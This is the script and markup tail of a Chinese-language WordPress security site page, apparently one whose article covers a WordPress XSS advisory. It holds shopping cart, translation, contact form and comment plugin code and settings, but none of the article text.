<script id="@surecart/cart-js-module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/cart/index.js?ver=c2f35b71b4309df849fe" type="module"></script>
<script id="@surecart/order-bumps-js-module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/order-bumps/index.js?ver=c639def39210a6244eb2" type="module"></script>
<script id="wp-script-module-data-@wordpress/interactivity" type="application/json">
{"state":{"surecart/order-bumps":{"currentPage":1,"perPage":3},"surecart/checkout":{"checkout":{"line_items":{"data":[]}},"discountIsRedeemable":false,"isDiscountApplied":false,"hasDiscountAmount":false,"hasSubtotalScratchAmount":false,"itemsCount":0,"hasItems":false}}}
</script>
<div id="fb-root"></div>
<script async defer crossorigin="anonymous" src="https://connect.facebook.net/zh_HK/sdk.js#xfbml=1&version=v17.0&appId=&autoLogAppEvents=1" nonce="Ci8te34e"></script>
<script>
window.scFetchData =
{"root_url":"https:\/\/wp-security.org\/zh\/wp-json\/","nonce":"f86a83cca8","nonce_endpoint":"https:\/\/wp-security.org\/wp-admin\/admin-ajax.php?action=sc-rest-nonce"} </script>
<!-- Render the cart. --> <div data-wp-context='{"formId":131,"mode":"live"}' data-wp-interactive='{ "namespace": "surecart/checkout" }' data-wp-init="callbacks.init" data-wp-watch="callbacks.onChangeCheckout" data-wp-on-window--storage="callbacks.syncTabs" class="sc-cart-wrapper is-layout-flow wp-container-surecart-slide-out-cart-is-layout-c8108a87 wp-block-surecart-slide-out-cart-is-layout-flow" > <div style="font-size:15px;width: 525px" class="sc-drawer sc-cart-drawer wp-block-surecart-slide-out-cart" role="dialog" data-wp-bind--aria-label="surecart/cart::state.ariaLabel" data-wp-class--open="surecart/cart::state.open" data-wp-on--keydown="surecart/cart::actions.handleKeydown" > <!-- Cart alert --> <div class="sc-alert sc-alert__alert--danger" role="alert" aria-live="assertive" aria-atomic="true" data-wp-bind--hidden="!state.error" hidden> <div class="sc-alert__icon"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10" /> <line x1="12" y1="8" x2="12" y2="12" /> <line x1="12" y1="16" x2="12.01" y2="16" /> </svg> </div> <div class="sc-alert__text"> <div class="sc-alert__title"> <span data-wp-text="state.errorTitle"></span> </div> <div class="sc-alert__message"> <div data-wp-text="state.errorMessage"></div> <template data-wp-each--message="state.additionalErrors"> <div> <span data-wp-text="context.message"></span> </div> </template> </div> </div> </div> <div class="wp-block-group is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-64e1162d wp-block-group-is-layout-flex" style="padding-top:1.5em;padding-right:2em;padding-bottom:0em;padding-left:2em"> <div style="line-height:1" class="wp-block-surecart-cart-close-button" data-wp-on--click="surecart/cart::actions.toggle" data-wp-on--keypress="surecart/cart::actions.toggle" role="button" tabindex="0" aria-label="關閉購物車" > <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="5" y1="12" x2="19" y2="12" /> <polyline points="12 5 19 12 12 19" /> </svg> </div> <p class="wp-block-paragraph" style="margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;font-size:16px;font-style:normal;font-weight:500;line-height:1"> 查看我的訂單</p> <span style="font-size:14px;font-weight:600;line-height:1;border-radius:4px;padding-top:6px;padding-bottom:6px;padding-left:10px;padding-right:10px" class="wp-block-surecart-cart-count" data-wp-text="state.itemsCount">0</span> </div> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"> <div style="padding-top:2em;padding-bottom:2em;padding-left:2em;padding-right:2em" class="wp-block-surecart-slide-out-cart-line-items is-layout-flow wp-container-surecart-slide-out-cart-line-items-is-layout-2e48a420 wp-block-surecart-slide-out-cart-line-items-is-layout-flow" role="list"> <template data-wp-each--line_item="state.checkoutLineItems" data-wp-each-key="context.line_item.id" > <div class="sc-product-line-item" data-wp-class--sc-product-line-item--has-swap="state.swap" role="listitem" data-wp-bind--aria-label="state.lineItemAriaLabel"> <div class="sc-product-line-item__content"> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"> <div class="wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-92927b4a wp-block-group-is-layout-flex"> <figure class="sc-cart-line-item-image-wrap wp-container-content-962be591 wp-duotone-unset-1" data-wp-bind--hidden="!context.line_item.image.src"> <img style="margin-top:0;margin-bottom:0;aspect-ratio:1;border-radius:4px;border-width:1px;margin-top:0;margin-bottom:0" class="sc-is-covered wp-block-surecart-cart-line-item-image" data-wp-bind--alt="context.line_item.image.alt" data-wp-bind--srcset="context.line_item.image.srcset" data-wp-bind--sizes="context.line_item.image.sizes" data-wp-bind--src="context.line_item.image.src" loading="lazy" /> </figure> <div class="wp-block-group wp-container-content-9cfa9a5a is-vertical is-content-justification-stretch is-nowrap is-layout-flex wp-container-core-group-is-layout-41c7e08e wp-block-group-is-layout-flex"> <div class="wp-block-group wp-container-content-9cfa9a5a is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-53e22457 wp-block-group-is-layout-flex"> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-c8108a87 wp-block-group-is-layout-flow"> <a style="font-style:normal;font-weight:500;line-height:1.4;text-decoration:none" class="wp-block-surecart-cart-line-item-title" data-wp-bind--href="state.lineItemPermalink"> <span data-wp-text="context.line_item.price.product.name"></span> </a> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-c8108a87 wp-block-group-is-layout-flow"> <div style="font-size:14px;line-height:1.4" class="wp-block-surecart-cart-line-item-price-name" data-wp-text="state.lineItemPriceName" data-wp-bind--hidden="!state.lineItemPriceName"></div> <div style="font-size:14px;line-height:1.4" class="wp-block-surecart-cart-line-item-variant" data-wp-text="state.lineItemVariant" data-wp-bind--hidden="!state.lineItemVariant"></div> <div data-wp-interactive='{ "namespace": "surecart/line-item-note" }' style="font-size:14px;line-height:1.4" class="wp-block-surecart-cart-line-item-note" data-wp-context='{}' data-wp-run="callbacks.init" data-wp-class--line-item-note--is-expanded="context.noteExpanded" data-wp-class--line-item-note--is-collapsible="context.showToggle" data-wp-bind--hidden="surecart/checkout::!state.lineItemNote" data-wp-on--click="actions.toggleNoteExpanded" data-wp-on--keydown="actions.toggleNoteExpanded" data-wp-bind--role="button" data-wp-bind--disabled="!context.showToggle" data-wp-bind--aria-expanded="context.noteExpanded" data-wp-bind--aria-label="Toggle note visibility" tabindex="0" > <div class="line-item-note__text" data-wp-text="surecart/checkout::state.lineItemNote" ></div> <span class="sc-icon" data-wp-class--sc-icon--rotated="context.noteExpanded" > <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <polyline points="6 9 12 15 18 9" /> </svg> </span> </div> </div></div> <div class="sc-product-line-item__purchasable-status wp-block-surecart-cart-line-item-status has-text-align-right" data-wp-text="context.line_item.purchasable_status_display" data-wp-bind--hidden="!context.line_item.purchasable_status_display" role="status" aria-live="polite" aria-atomic="true" > </div> </div></div> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-c8108a87 wp-block-group-is-layout-flow"> <div class="wp-block-group is-content-justification-right is-nowrap is-layout-flex wp-container-core-group-is-layout-f843080e wp-block-group-is-layout-flex" style="line-height:1.4"> <div class="wp-block-surecart-cart-line-item-scratch-amount" data-wp-text="context.line_item.scratch_display_amount" data-wp-bind--hidden="!state.lineItemHasScratchAmount" ></div> <div style="font-style:normal;font-weight:500" class="wp-block-surecart-cart-line-item-amount has-text-align-right" data-wp-text="context.line_item.subtotal_display_amount"></div> <div style="font-size:14px" class="wp-block-surecart-cart-line-item-interval" data-wp-bind--hidden="!context.line_item.price.short_interval_text"> <span class="wp-block-surecart-cart-line-item-interval__interval" data-wp-bind--hidden="!context.line_item.price.short_interval_text" data-wp-text="context.line_item.price.short_interval_text" ></span> <span class="wp-block-surecart-cart-line-item-interval__count" data-wp-bind--hidden="!context.line_item.price.short_interval_count_text" data-wp-text="context.line_item.price.short_interval_count_text" ></span> </div> </div> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-c8108a87 wp-block-group-is-layout-flow"> <div style="font-size:14px" class="wp-block-surecart-cart-line-item-trial has-text-align-right" data-wp-bind--hidden="!context.line_item.price.trial_text" data-wp-text="context.line_item.price.trial_text" ></div> <template data-wp-each--fee="state.lineItemFees" data-wp-each-key="context.fee.id" > <div style="font-size:14px" class="wp-block-surecart-cart-line-item-fees has-text-align-right"> <span style="font-size:14px" class="wp-block-surecart-cart-line-item-fees has-text-align-right" data-wp-text="context.fee.display_amount" ></span> <span style="font-size:14px" class="wp-block-surecart-cart-line-item-fees has-text-align-right" data-wp-text="context.fee.description" ></span> </div> </template> </div></div> </div></div> </div> <div class="wp-block-group is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-e5460375 wp-block-group-is-layout-flex"> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"><div class="sc-input-group sc-input-group-sm sc-quantity-selector wp-block-surecart-cart-line-item-quantity" data-wp-class--quantity--disabled="state.isQuantityDisabled" data-wp-bind--hidden="!state.isEditable" hidden="1"> <div class="sc-input-group-text sc-quantity-selector__decrease" role="button" tabindex="0" data-wp-on--click="surecart/checkout::actions.onQuantityDecrease" data-wp-on--keydown="surecart/checkout::actions.onQuantityDecrease" data-wp-bind--disabled="state.isQuantityDecreaseDisabled" data-wp-bind--aria-disabled="state.isQuantityDecreaseDisabled" data-wp-class--button--disabled="state.isQuantityDecreaseDisabled" data-wp-bind--aria-label="surecart/checkout::state.decreaseQuantityAriaLabel" > <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="5" y1="12" x2="19" y2="12" /> </svg> </div> <input type="number" class="sc-form-control sc-quantity-selector__control" data-wp-bind--value="context.line_item.quantity" data-wp-on--change="surecart/checkout::actions.onQuantityChange" data-wp-bind--min="context.line_item.min" data-wp-bind--aria-valuemin="context.line_item.min" data-wp-bind--max="context.line_item.max" data-wp-bind--aria-valuemax="context.line_item.max" data-wp-bind--aria-valuenow="context.line_item.quantity" data-wp-bind--disabled="surecart/checkout::state.loading" data-wp-bind--aria-label="surecart/checkout::state.quantityInputAriaLabel" step="1" autocomplete="off" role="spinbutton" /> <div class="sc-input-group-text sc-quantity-selector__increase" role="button" tabindex="0" data-wp-on--click="surecart/checkout::actions.onQuantityIncrease" data-wp-on--keydown="surecart/checkout::actions.onQuantityIncrease" data-wp-bind--disabled="state.isQuantityIncreaseDisabled" data-wp-bind--aria-disabled="state.isQuantityIncreaseDisabled" data-wp-class--button--disabled="state.isQuantityIncreaseDisabled" data-wp-bind--aria-label="surecart/checkout::state.increaseQuantityAriaLabel" > <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="12" y1="5" x2="12" y2="19" /> <line x1="5" y1="12" x2="19" y2="12" /> </svg> </div> </div> </div></div> <div class="wp-block-group is-vertical is-content-justification-right is-layout-flex wp-container-core-group-is-layout-4c9338fd wp-block-group-is-layout-flex"> <div style="font-size:14px;font-style:normal;font-weight:400" class="wp-block-surecart-cart-line-item-remove" data-wp-bind--aria-label="surecart/checkout::state.removeItemAriaLabel" data-wp-on--click="surecart/checkout::actions.removeLineItem" data-wp-on--keydown="surecart/checkout::actions.removeLineItem" role="button" tabindex="0" > <svg class="wp-block-surecart-cart-line-item-remove__icon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="18" y1="6" x2="6" y2="18" /> <line x1="6" y1="6" x2="18" y2="18" /> </svg> <span class="wp-block-surecart-cart-line-item-remove__label"> 移除 </span> </div> </div> </div> </div> </div> </div></div> </div> <div class="sc-product-line-item__swap" data-wp-bind--hidden="!state.swap" hidden data-wp-on--click="actions.toggleSwap"> <div class="sc-product-line-item__swap-content"> <button type="button" class="sc-toggle" role="switch" aria-checked="false" data-wp-bind--aria-checked="context.line_item.swap" data-wp-class--sc-toggle--checked="context.line_item.swap"> <span class="sc-toggle__label">使用設置</span> <span aria-hidden="true" class="sc-toggle__knob"></span> </button> <span data-wp-text="state.swap.description"></span> </div> <div class="sc-product-line-item__swap-amount"> <span data-wp-text="state.swapDisplayAmount" class="sc-product-line-item__swap-amount-value"></span> <span data-wp-text="state.swapIntervalText" class="sc-product-line-item__swap-amount-interval"></span> <span data-wp-text="state.swapIntervalCountText" class="sc-product-line-item__swap-amount-interval-count"></span> </div> </div> </div> </template> </div> </div></div> <div class="wp-block-group" style="border-top-color:#b0b0b069;border-top-width:1px;padding-top:0em;padding-right:0em;padding-bottom:0em;padding-left:0em"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"> <div style="border-bottom-width:1px;border-bottom-color:#b0b0b069;padding-top:1.5em;padding-bottom:1.5em;padding-left:2em;padding-right:2em" class="wp-block-surecart-cart-order-bumps" data-wp-context='{"hideAddedItems":true}' data-wp-interactive='{ "namespace": "surecart/order-bumps" }' data-wp-init="callbacks.init" data-wp-bind--hidden="!state.hasOrderBumps" hidden> <div class="wp-block-group is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-768bb735 wp-block-group-is-layout-flex" style="margin-bottom:0.75em"> <p class="wp-block-paragraph" style="margin-top:0;margin-bottom:0;font-style:normal;font-weight:500">為您推薦</p> <nav class="wp-block-surecart-cart-order-bump-pagination is-layout-flex wp-container-surecart-cart-order-bump-pagination-is-layout-00ae689d wp-block-surecart-cart-order-bump-pagination-is-layout-flex" data-wp-bind--hidden="!state.showPagination" aria-label="訂單增值分頁" hidden> <div aria-disabled="true" disabled class="has-arrow-type-chevron wp-block-surecart-cart-order-bump-pagination-previous" data-wp-on--click="surecart/order-bumps::actions.previousPage" data-wp-on--keydown="surecart/order-bumps::actions.handlePreviousKeydown" data-wp-bind--disabled="!state.hasPreviousPage" data-wp-bind--aria-disabled="!state.hasPreviousPage" aria-label="上一頁" role="button" tabindex="0" > <svg aria-hidden="true" class="wp-block-surecart-cart-order-bump-pagination-previous__icon" xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <polyline points="15 18 9 12 15 6" /> </svg> </div> <div aria-disabled="true" disabled class="has-arrow-type-chevron wp-block-surecart-cart-order-bump-pagination-next" data-wp-on--click="surecart/order-bumps::actions.nextPage" data-wp-on--keydown="surecart/order-bumps::actions.handleNextKeydown" data-wp-bind--disabled="!state.hasNextPage" data-wp-bind--aria-disabled="!state.hasNextPage" aria-label="下一頁" role="button" tabindex="0" > <svg aria-hidden="true" class="wp-block-surecart-cart-order-bump-pagination-next__icon" xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <polyline points="9 18 15 12 9 6" /> </svg> </div> </nav> </div> <ul class="wp-block-surecart-cart-order-bump-template is-layout-flex wp-container-surecart-cart-order-bump-template-is-layout-e99f66c5 wp-block-surecart-cart-order-bump-template-is-layout-flex" role="list" data-wp-class--has-overflow="state.hasMultipleBumps" data-wp-on--scrollend="callbacks.onCarouselScroll" data-wp-on--keydown="actions.handleCarouselKeydown" tabindex="0" data-wp-bind--aria-label="state.orderBumpsListAriaLabel" > <template data-wp-each--bump="state.orderBumps" data-wp-each-key="context.bump.id" > <li class="sc-cart-order-bump-item" role="listitem"> <div class="wp-block-group has-border-color wp-container-content-9cfa9a5a is-nowrap is-layout-flex wp-container-core-group-is-layout-e91b8ce6 wp-block-group-is-layout-flex" style="border-color:#e0e0e0;border-width:1px;border-radius:12px;padding-top:0.75em;padding-right:1em;padding-bottom:0.75em;padding-left:0.75em"> <figure class="sc-cart-order-bump-image-wrap wp-container-content-d0d0a6b5" data-wp-bind--hidden="!context.bump.price.product.line_item_image.src"> <img style="aspect-ratio:1;width:72px;border-radius:8px" class="sc-is-covered wp-block-surecart-cart-order-bump-image" data-wp-bind--alt="context.bump.price.product.name" data-wp-bind--src="context.bump.price.product.line_item_image.src" loading="lazy" /> </figure> <div class="wp-block-group wp-container-content-9cfa9a5a is-vertical is-layout-flex wp-container-core-group-is-layout-0370e391 wp-block-group-is-layout-flex"> <span style="font-size:15px;font-weight:600;line-height:1.3" class="wp-block-surecart-cart-order-bump-title" data-wp-text="context.bump.name" ></span> <div style="color:#6b7280;font-size:13px;line-height:1.3" class="wp-block-surecart-cart-order-bump-description has-text-color" data-wp-bind--hidden="!context.bump.metadata.description" data-wp-text="context.bump.metadata.description" hidden></div> <div class="wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-0cf19278 wp-block-group-is-layout-flex"> <div style="font-size:14px" class="wp-block-surecart-cart-order-bump-scratch-amount" data-wp-text="context.bump.subtotal_display_amount" data-wp-bind--hidden="!state.bumpHasDiscount" ></div> <div style="font-size:14px;font-weight:500" class="wp-block-surecart-cart-order-bump-amount" data-wp-text="context.bump.total_display_amount"></div> </div> </div> <div style="font-size:18px;font-weight:400;border-color:#d1d5db;border-top-left-radius:74.6%;border-top-right-radius:74.6%;border-bottom-left-radius:74.6%;border-bottom-right-radius:74.6%;border-width:1px;padding-top:0.5em;padding-bottom:0.5em;padding-left:0.5em;padding-right:0.5em" class="sc-cart-order-bump-add-button wp-block-surecart-cart-order-bump-add-button has-border-color" role="button" tabindex="0" data-wp-on--click="surecart/order-bumps::actions.addBumpToCart" data-wp-on--keydown="surecart/order-bumps::actions.handleAddButtonKeydown" data-wp-bind--disabled="state.isBumpInCart" data-wp-bind--aria-disabled="state.isBumpInCart" data-wp-class--sc-cart-order-bump-add-button--added="state.isBumpInCart" data-wp-bind--aria-label="state.addButtonAriaLabel" aria-label="加入購物車" > <span class="sc-cart-order-bump-add-button__icon" aria-hidden="true" data-wp-bind--hidden="state.isBumpInCart"> <svg aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="12" y1="5" x2="12" y2="19" /> <line x1="5" y1="12" x2="19" y2="12" /> </svg> </span> <span class="sc-cart-order-bump-add-button__icon" aria-hidden="true" data-wp-bind--hidden="!state.isBumpInCart" hidden> <svg aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <polyline points="20 6 9 17 4 12" /> </svg> </span> </div> </div> </li> </template> </ul> </div> <div class="wp-block-group" style="margin-top:0;margin-bottom:0;padding-top:2em;padding-right:2em;padding-bottom:2em;padding-left:2em"><div class="wp-block-group__inner-container is-layout-constrained wp-container-core-group-is-layout-491b0754 wp-block-group-is-layout-constrained"> <div class="wp-block-surecart-slide-out-cart-items-subtotal is-content-justification-space-between is-nowrap is-layout-flex wp-container-surecart-slide-out-cart-items-subtotal-is-layout-0a93696a wp-block-surecart-slide-out-cart-items-subtotal-is-layout-flex"> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-c8108a87 wp-block-group-is-layout-flow"> <p class="wp-block-paragraph" style="margin-top:0px;margin-bottom:0px;font-size:18px;font-style:normal;font-weight:500;line-height:1.4"> 小計</p> <p class="has-text-color has-link-color wp-elements-3ccbd622ec95a2fb9ce4984e15710a06 wp-block-paragraph" style="color:var(--sc-input-help-text-color);font-size:14px;line-height:1.4">稅金和運費在結帳時計算</p> </div></div> <div class="wp-block-group is-content-justification-right is-nowrap is-layout-flex wp-container-core-group-is-layout-f843080e wp-block-group-is-layout-flex"><span style="font-size:18px;line-height:1.4" class="wp-block-surecart-cart-subtotal-scratch-amount" data-wp-text="state.checkout.subtotal_scratch_display_amount" data-wp-bind--hidden="!state.hasSubtotalScratchAmount" data-wp-bind--aria-label="state.subtotalScratchAriaLabel" hidden></span> <span style="font-size:18px;font-style:normal;font-weight:500;line-height:1.4" class="wp-block-surecart-cart-subtotal-amount" data-wp-text="state.checkout.subtotal_display_amount"></span> </div> </div> <div class="sc-cart-items-submit__wrapper" style="" > <div class="wp-block-button"> <a style="border-radius:4px" class="wp-block-button__link wp-element-button sc-button__link wp-block-surecart-slide-out-cart-items-submit" href="https://wp-security.org/zh/checkout/" data-wp-bind--disabled="state.loading" data-wp-class--sc-button__link--busy="state.loading" > <span class="sc-spinner" aria-hidden="false"></span> <span class="sc-button__link-text">結帳</span> </a> </div> </div> </div></div> </div></div> <div class="sc-block-ui" data-wp-bind--hidden="!state.loading" hidden></div> </div> <!-- backdrop --> <div class="sc-drawer__backdrop" data-wp-on--mousedown="surecart/cart::actions.closeOverlay" data-wp-on--touchstart="surecart/cart::actions.closeOverlay" data-wp-class--show="surecart/cart::state.open" data-wp-on--keydown="surecart/cart::actions.handleKeydown"></div> </div> <!-- Render floating cart icon --> <div data-wp-interactive='{ "namespace": "surecart/checkout" }' class="wp-block-surecart-cart-icon" data-wp-context='{"formId":131,"mode":"live"}' data-wp-on--click="surecart/cart::actions.toggle" data-wp-on--keydown="surecart/cart::actions.toggle" tabindex="0" role="button" data-wp-bind--hidden="!state.hasItems" hidden> <div class="wp-block-surecart-cart-icon__container"> <div class="wp-block-surecart-cart-icon__icon" aria-label="購物車按鈕。."> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <path d="M6 2L3 6v14a2 2 0 0 0 2 2h14a2 2 0 0 0 2-2V6l-3-4z" /> <line x1="3" y1="6" x2="21" y2="6" /> <path d="M16 10a4 4 0 0 1-8 0" /> </svg> </div> <span class="wp-block-surecart-cart-icon__count" data-wp-text="state.itemsCount" data-wp-bind--aria-label="state.itemsCountAriaLabel" >0</span> </div> </div><script id="wp-url-js" src="https://wp-security.org/wp-includes/js/dist/url.min.js?ver=bb0f766c3d2efe497871"></script>
<script id="wp-hooks-js" src="https://wp-security.org/wp-includes/js/dist/hooks.min.js?ver=7496969728ca0f95732d"></script>
<script id="wp-i18n-js" src="https://wp-security.org/wp-includes/js/dist/i18n.min.js?ver=781d11515ad3d91786ec"></script>
<script id="wp-i18n-js-after">
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
//# sourceURL=wp-i18n-js-after
</script>
<script id="wp-api-fetch-js-translations">
( function( domain, translations ) {
var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
localeData[""].domain = domain;
wp.i18n.setLocaleData( localeData, domain );
} )( "default", {"translation-revision-date":"2022-07-15 14:05:27+0000","generator":"GlotPress\/4.0.1","domain":"messages","locale_data":{"messages":{"":{"domain":"messages","plural-forms":"nplurals=1; plural=0;","lang":"zh_HK"},"An unknown error occurred.":["\u767c\u751f\u672a\u77e5\u7684\u932f\u8aa4\u3002"],"The response is not a valid JSON response.":["\u7121\u6548\u7684 JSON \u56de\u61c9\u3002"],"Media upload failed. If this is a photo or a large image, please scale it down and try again.":["\u5a92\u9ad4\u4e0a\u8f09\u5931\u6557\u3002\u5982\u679c\u9019\u662f\u7167\u7247\u6216\u5927\u578b\u5c3a\u5bf8\u5716\u7247\uff0c\u8acb\u5148\u7e2e\u5c0f\u5c3a\u5bf8\u518d\u4e0a\u8f09\u3002"],"You are probably offline.":["\u9019\u500b\u7db2\u7ad9\u76ee\u524d\u53ef\u80fd\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002"]}},"comment":{"reference":"wp-includes\/js\/dist\/api-fetch.js"}} );
//# sourceURL=wp-api-fetch-js-translations
</script>
<script id="wp-api-fetch-js" src="https://wp-security.org/wp-includes/js/dist/api-fetch.min.js?ver=d7efe4dc1468d36c39b8"></script>
<script id="wp-api-fetch-js-after">
wp.apiFetch.use( wp.apiFetch.createRootURLMiddleware( "https://wp-security.org/zh/wp-json/" ) );
wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "f86a83cca8" );
wp.apiFetch.use( wp.apiFetch.nonceMiddleware );
wp.apiFetch.use( wp.apiFetch.mediaUploadMiddleware );
wp.apiFetch.nonceEndpoint = "https://wp-security.org/wp-admin/admin-ajax.php?action=rest-nonce";
//# sourceURL=wp-api-fetch-js-after
</script>
<script id="wp-dom-ready-js" src="https://wp-security.org/wp-includes/js/dist/dom-ready.min.js?ver=a06281ae5cf5500e9317"></script>
<script id="wp-a11y-js-translations">
( function( domain, translations ) {
var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
localeData[""].domain = domain;
wp.i18n.setLocaleData( localeData, domain );
} )( "default", {"translation-revision-date":"2022-07-15 14:05:27+0000","generator":"GlotPress\/4.0.1","domain":"messages","locale_data":{"messages":{"":{"domain":"messages","plural-forms":"nplurals=1; plural=0;","lang":"zh_HK"},"Notifications":["\u901a\u77e5"]}},"comment":{"reference":"wp-includes\/js\/dist\/a11y.js"}} );
//# sourceURL=wp-a11y-js-translations
</script>
<script id="wp-a11y-js" src="https://wp-security.org/wp-includes/js/dist/a11y.min.js?ver=af934e5259bc51b8718e"></script>
<script id="trp-dynamic-translator-js-extra">
var trp_data = {"trp_custom_ajax_url":"https://wp-security.org/wp-content/plugins/translatepress-multilingual/includes/trp-ajax.php","trp_wp_ajax_url":"https://wp-security.org/wp-admin/admin-ajax.php","trp_language_to_query":"zh_HK","trp_original_language":"en_US","trp_current_language":"zh_HK","trp_skip_selectors":["[data-no-translation]","[data-no-dynamic-translation]","[data-trp-translate-id-innertext]","script","style","head","trp-span","translate-press","[data-trp-translate-id]","[data-trpgettextoriginal]","[data-trp-post-slug]"],"trp_base_selectors":["data-trp-translate-id","data-trpgettextoriginal","data-trp-post-slug"],"trp_attributes_selectors":{"text":{"accessor":"outertext","attribute":false},"block":{"accessor":"innertext","attribute":false},"image_src":{"selector":"img[src]","accessor":"src","attribute":true},"submit":{"selector":"input[type='submit'],input[type='button'], input[type='reset']","accessor":"value","attribute":true},"placeholder":{"selector":"input[placeholder],textarea[placeholder]","accessor":"placeholder","attribute":true},"title":{"selector":"[title]","accessor":"title","attribute":true},"a_href":{"selector":"a[href]","accessor":"href","attribute":true},"button":{"accessor":"outertext","attribute":false},"option":{"accessor":"innertext","attribute":false},"aria_label":{"selector":"[aria-label]","accessor":"aria-label","attribute":true},"video_src":{"selector":"video[src]","accessor":"src","attribute":true},"video_poster":{"selector":"video[poster]","accessor":"poster","attribute":true},"video_source_src":{"selector":"video source[src]","accessor":"src","attribute":true},"audio_src":{"selector":"audio[src]","accessor":"src","attribute":true},"audio_source_src":{"selector":"audio source[src]","accessor":"src","attribute":true},"picture_image_src":{"selector":"picture image[src]","accessor":"src","attribute":true},"picture_source_srcset":{"selector":"picture source[srcset]","accessor":"srcset","attribute":true}},"trp_attributes_accessors":["outertext","innertext","src","value","placeholder","title","href","aria-label","poster","srcset"],"gettranslationsnonceregular":"f691c192bb","showdynamiccontentbeforetranslation":"","skip_strings_from_dynamic_translation":[],"skip_strings_from_dynamic_translation_for_substrings":{"href":["amazon-adsystem","googleads","g.doubleclick"]},"duplicate_detections_allowed":"100","trp_translate_numerals_opt":"no","trp_no_auto_translation_selectors":["[data-no-auto-translation]"]};
//# sourceURL=trp-dynamic-translator-js-extra
</script>
<script id="trp-dynamic-translator-js" src="https://wp-security.org/wp-content/plugins/translatepress-multilingual/assets/js/trp-translate-dom-changes.js?ver=3.2.1"></script>
<script id="powerkit-js" src="https://wp-security.org/wp-content/plugins/powerkit/assets/js/_scripts.js?ver=3.0.7"></script>
<script id="swv-js" src="https://wp-security.org/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.1.6"></script>
<script id="contact-form-7-js-before">
var wpcf7 = {
"api": {
"root": "https:\/\/wp-security.org\/zh\/wp-json\/",
"namespace": "contact-form-7\/v1"
},
"cached": 1
};
//# sourceURL=contact-form-7-js-before
</script>
<script id="contact-form-7-js" src="https://wp-security.org/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.1.6"></script>
<script id="disqus_count-js-extra">
var countVars = {"disqusShortname":"wp-security-org"};
//# sourceURL=disqus_count-js-extra
</script>
<script id="disqus_count-js" src="https://wp-security.org/wp-content/plugins/disqus-comment-system/public/js/comment_count.js?ver=3.1.4"></script>
<script id="disqus_embed-js-extra">
var embedVars = {"disqusConfig":{"integration":"wordpress 3.1.4 7.0"},"disqusIdentifier":"803 https://wp-security.org/uncategorized/hong-kong-security-ngo-warns-wordpress-xsscve20258685/","disqusShortname":"wp-security-org","disqusTitle":"Hong Kong Security NGO warns WordPress XSS(CVE20258685)","disqusUrl":"https://wp-security.org/zh/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/","postId":"803"};
//# sourceURL=disqus_embed-js-extra
</script>
